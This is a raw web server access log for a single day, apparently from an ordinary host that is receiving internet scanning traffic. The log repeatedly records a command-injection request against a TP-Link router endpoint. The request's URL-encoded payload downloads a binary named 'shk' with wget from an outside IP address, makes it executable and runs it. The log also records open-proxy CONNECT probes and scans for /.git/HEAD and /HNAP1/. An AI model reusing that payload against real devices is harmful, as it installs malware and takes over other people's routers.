185.224.128.34 - - [05/Apr/2024:00:28:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 87.121.69.25 - - [05/Apr/2024:01:27:14 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 146.19.24.28 - - [05/Apr/2024:01:43:14 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [05/Apr/2024:01:45:32 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 206.168.32.3 - - [05/Apr/2024:01:46:19 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [05/Apr/2024:01:46:22 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [05/Apr/2024:01:46:23 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.224.128.34 - - [05/Apr/2024:01:54:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 45.128.232.152 - - [05/Apr/2024:02:21:55 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [05/Apr/2024:02:21:55 +0200] "-" 400 1930 45.128.232.152 - - [05/Apr/2024:02:21:56 +0200] "-" 400 1930 45.128.232.152 - - [05/Apr/2024:02:21:56 +0200] "-" 400 1930 87.121.69.52 - - [05/Apr/2024:02:22:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 54.67.98.25 - - [05/Apr/2024:02:23:33 +0200] "GET / HTTP/1.1" 200 1895 120.77.61.136 - - [05/Apr/2024:02:37:53 +0200] "GET / HTTP/1.1" 200 1895 120.79.94.168 - - [05/Apr/2024:02:42:41 +0200] "GET / HTTP/1.1" 200 1895 80.82.77.202 - - [05/Apr/2024:02:50:17 +0200] "-" 400 1930 80.82.77.202 - - [05/Apr/2024:02:50:33 +0200] "GET / HTTP/1.0" 200 1895 80.82.77.202 - - [05/Apr/2024:02:51:38 +0200] "GET / HTTP/1.1" 200 1895 77.242.21.70 - - [05/Apr/2024:02:54:00 +0200] "GET / HTTP/1.1" 200 1895 205.210.31.198 - - [05/Apr/2024:03:11:00 +0200] "GET / HTTP/1.0" 200 1895 92.249.48.100 - - [05/Apr/2024:03:16:37 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 404 756 45.128.232.152 - - [05/Apr/2024:03:19:00 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [05/Apr/2024:03:19:00 +0200] "-" 400 1930 45.128.232.152 - - [05/Apr/2024:03:19:00 +0200] "-" 400 1930 45.128.232.152 - - [05/Apr/2024:03:19:00 +0200] "-" 400 1930 109.201.197.138 - - [05/Apr/2024:03:38:58 +0200] "GET / HTTP/1.1" 200 1895 146.19.24.28 - - [05/Apr/2024:03:51:11 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.34 - - [05/Apr/2024:03:54:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 94.237.36.253 - - [05/Apr/2024:04:08:32 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [05/Apr/2024:04:26:20 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [05/Apr/2024:04:26:58 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 44.220.188.62 - - [05/Apr/2024:04:42:53 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.215 - - [05/Apr/2024:04:52:35 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.218 - - [05/Apr/2024:04:53:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.218 - - [05/Apr/2024:04:53:18 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.219 - - [05/Apr/2024:04:53:23 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 92.249.48.100 - - [05/Apr/2024:05:16:49 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 404 756 185.224.128.34 - - [05/Apr/2024:06:15:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 80.75.212.75 - - [05/Apr/2024:06:21:29 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 146.19.24.28 - - [05/Apr/2024:06:54:14 +0200] "GET / HTTP/1.1" 200 1895 46.174.191.31 - - [05/Apr/2024:07:23:49 +0200] "GET / HTTP/1.0" 200 1895 206.168.32.3 - - [05/Apr/2024:07:42:46 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [05/Apr/2024:07:42:49 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [05/Apr/2024:07:42:49 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.224.128.34 - - [05/Apr/2024:07:50:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 185.36.81.40 - - [05/Apr/2024:08:05:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 187.149.181.37 - - [05/Apr/2024:08:10:35 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [05/Apr/2024:08:40:58 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.52 - - [05/Apr/2024:08:41:41 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [05/Apr/2024:09:00:48 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 78.108.177.51 - - [05/Apr/2024:09:14:37 +0200] "GET / HTTP/1.0" 200 1895 107.170.232.21 - - [05/Apr/2024:09:15:02 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [05/Apr/2024:09:29:07 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 198.235.24.201 - - [05/Apr/2024:09:50:59 +0200] "-" 400 1930 198.235.24.201 - - [05/Apr/2024:09:50:59 +0200] "-" 400 1930 212.171.236.196 - - [05/Apr/2024:10:11:07 +0200] "GET / HTTP/1.0" 200 1895 80.75.212.75 - - [05/Apr/2024:10:28:22 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 185.224.128.34 - - [05/Apr/2024:10:50:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 107.170.229.5 - - [05/Apr/2024:10:51:56 +0200] "-" 400 1930 152.42.176.18 - - [05/Apr/2024:10:52:43 +0200] "GET /ip HTTP/1.1" 404 720 146.19.24.28 - - [05/Apr/2024:11:00:31 +0200] "GET / HTTP/1.1" 200 1895 69.164.217.74 - - [05/Apr/2024:11:27:03 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.56 - - [05/Apr/2024:11:43:20 +0200] "GET / HTTP/1.1" 200 1895 146.19.24.28 - - [05/Apr/2024:11:52:51 +0200] "GET / HTTP/1.1" 200 1895 45.79.168.172 - - [05/Apr/2024:12:00:50 +0200] "GET / HTTP/1.1" 200 1895 172.104.11.4 - - [05/Apr/2024:12:01:12 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.34 - - [05/Apr/2024:12:03:40 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 185.150.26.249 - - [05/Apr/2024:12:23:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 172.105.128.11 - - [05/Apr/2024:12:45:15 +0200] "GET / HTTP/1.1" 200 1895 146.19.24.28 - - [05/Apr/2024:12:50:14 +0200] "GET / HTTP/1.1" 200 1895 103.70.147.173 - - [05/Apr/2024:12:59:24 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [05/Apr/2024:13:05:19 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [05/Apr/2024:13:09:55 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 87.121.69.25 - - [05/Apr/2024:13:33:05 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 146.19.24.28 - - [05/Apr/2024:13:52:08 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.34 - - [05/Apr/2024:13:57:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 91.92.245.67 - - [05/Apr/2024:14:04:18 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 134.19.179.155 - - [05/Apr/2024:14:30:25 +0200] "GET / HTTP/1.1" 200 1895 134.19.179.155 - - [05/Apr/2024:14:30:26 +0200] "GET /HNAP1/ HTTP/1.1" 404 728 87.121.69.52 - - [05/Apr/2024:14:33:34 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.94.92.60 - - [05/Apr/2024:14:50:36 +0200] "GET / HTTP/1.1" 200 1895 65.49.1.98 - - [05/Apr/2024:15:17:14 +0200] "-" 400 1930 80.75.212.75 - - [05/Apr/2024:15:34:28 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 91.92.245.67 - - [05/Apr/2024:15:57:41 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 46.101.227.5 - - [05/Apr/2024:16:03:48 +0200] "GET /.git/HEAD HTTP/1.1" 404 731 185.36.81.40 - - [05/Apr/2024:16:33:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [05/Apr/2024:16:33:55 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 185.224.128.34 - - [05/Apr/2024:16:48:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 186.235.64.158 - - [05/Apr/2024:17:43:20 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [05/Apr/2024:18:00:23 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 80.66.88.211 - - [05/Apr/2024:18:31:35 +0200] "-" 400 1930 185.224.128.34 - - [05/Apr/2024:18:42:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 87.121.69.25 - - [05/Apr/2024:18:44:34 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 185.224.128.34 - - [05/Apr/2024:20:05:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 167.94.146.51 - - [05/Apr/2024:20:09:58 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.51 - - [05/Apr/2024:20:10:01 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.51 - - [05/Apr/2024:20:10:01 +0200] "GET /favicon.ico HTTP/1.1" 404 729 80.75.212.75 - - [05/Apr/2024:20:27:16 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.52 - - [05/Apr/2024:20:34:18 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 146.19.24.28 - - [05/Apr/2024:20:49:48 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [05/Apr/2024:21:12:02 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [05/Apr/2024:21:12:05 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [05/Apr/2024:21:12:06 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.180.143.49 - - [05/Apr/2024:22:15:17 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.34 - - [05/Apr/2024:22:31:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 205.210.31.22 - - [05/Apr/2024:22:32:17 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [05/Apr/2024:23:04:51 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 198.235.24.228 - - [05/Apr/2024:23:07:46 +0200] "-" 400 1930 198.235.24.228 - - [05/Apr/2024:23:07:46 +0200] "-" 400 1930 146.19.24.28 - - [05/Apr/2024:23:10:03 +0200] "GET / HTTP/1.1" 200 1895 196.12.130.19 - - [05/Apr/2024:23:42:55 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 185.36.81.40 - - [05/Apr/2024:23:59:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804